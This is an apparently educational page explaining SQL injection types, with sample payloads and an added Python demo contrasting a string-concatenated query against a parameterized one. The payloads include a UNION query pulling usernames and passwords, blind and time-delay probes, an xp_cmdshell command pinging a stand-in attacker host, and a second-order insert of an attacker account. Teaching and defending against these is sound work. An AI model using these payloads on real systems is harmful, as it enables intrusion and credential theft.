SQL Injection (SQLi) is an attack technique that allows an attacker to manipulate the SQL queries that an application makes to its database. There are several different types of SQLi such as:
In-Band SQL Injection
This is the most common and easy-to-exploit form of SQL injection, where the attacker uses the same communication channel for both launching the attack and receiving the results.
- Error-Based SQLi – Leverages detailed error messages from the database to understand the structure and perform further exploitation.
- Union-Based SQLi – Uses the 'UNION' SQL operator to combine the results of two or more 'SELECT' statements into a single result.
Payload example:
' UNION SELECT username, password FROM users --
This payload attempts to retrieve usernames and passwords from the 'users' table.
Inferential SQL Injection (Blind SQL Injection)
This does not directly return data from the database. Instead, attackers deduce information based on the application’s responses to their input.
- Boolean-Based Blind SQLi – The attacker sends SQL queries that force the application to return different results depending on whether the query returns true or false.
Payload examples:
' AND 1=1 --
' AND 1=2 --
The first payload should return a valid result, while the second should return no result, allowing the attacker to infer whether the injected condition was true.
- Time-Based Blind SQLi – The attacker sends queries that cause delays in the database's responses if certain conditions are true.
Payload example:
'; IF (1=1) WAITFOR DELAY '00:00:05' --
This payload forces the database to wait for 5 seconds if the condition is true.
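As an added example that is not part of the original page, the two boolean-based probes above are run against a lookup built by string concatenation and against the same lookup with a bound parameter (Python with the standard sqlite3 module; the users table and its rows are constructed for the demo). The difference in responses is exactly the signal a blind probe relies on, and the parameterized form removes it.

```python
import sqlite3

# Constructed sample data for the demonstration; the passwords are placeholders.
SAMPLE_USERS = [("alice", "alice-pw"), ("bob", "bob-pw")]

# The two boolean-based probes from the page, prefixed with a known username so that
# the only difference between the two requests is the truth of the appended condition.
PROBE_TRUE = "alice' AND 1=1 --"
PROBE_FALSE = "alice' AND 1=2 --"


def make_db():
    """Creates an in-memory SQLite database holding the constructed users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return con


def lookup_vulnerable(con, username):
    """Builds the query by string concatenation, so the input is parsed as SQL."""
    query = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in con.execute(query)]


def lookup_parameterized(con, username):
    """Binds the input as a parameter, so the driver only ever treats it as data."""
    query = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in con.execute(query, (username,))]


def responses_differ(lookup, con):
    """True when the true/false probes give different results, meaning the
    condition reached the SQL parser; identical results mean it was never
    evaluated as SQL."""
    return lookup(con, PROBE_TRUE) != lookup(con, PROBE_FALSE)


def demo():
    con = make_db()
    return {
        "vulnerable": {
            "true": lookup_vulnerable(con, PROBE_TRUE),
            "false": lookup_vulnerable(con, PROBE_FALSE),
            "injectable": responses_differ(lookup_vulnerable, con),
        },
        "parameterized": {
            "true": lookup_parameterized(con, PROBE_TRUE),
            "false": lookup_parameterized(con, PROBE_FALSE),
            "injectable": responses_differ(lookup_parameterized, con),
        },
    }
```

The concatenated lookup returns alice for the true probe and nothing for the false one, while the parameterized lookup returns nothing for both because the whole string is compared as a username.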
Out-of-band SQL Injection
This is less common and involves using different communication channels for the attack and the results. It is typically used when in-band techniques are not effective, and it relies on the database server's capability to make HTTP or DNS requests.
Payload example:
'; EXEC xp_cmdshell('ping -n 5 attacker.com') --
This payload attempts to make the database server ping an external host; the DNS lookup that the ping triggers is the out-of-band channel through which data is effectively exfiltrated.
Second-Order SQL Injection
This occurs when malicious input is not executed immediately but is stored in the database and later retrieved and used in a different context. It is particularly tricky because the initial input seems harmless: it is stored safely, but when it is later read back and concatenated into a new query, the payload it carries is executed.
Payload example (submitted as a username and stored as-is):
normaluser'); INSERT INTO users (username, password) VALUES ('attacker', 'pass123'); --
The stored value is later retrieved and placed, unescaped, into another query, for example when the application looks up the user:
SELECT * FROM users WHERE username = 'normaluser'); INSERT INTO users (username, password) VALUES ('attacker', 'pass123'); --';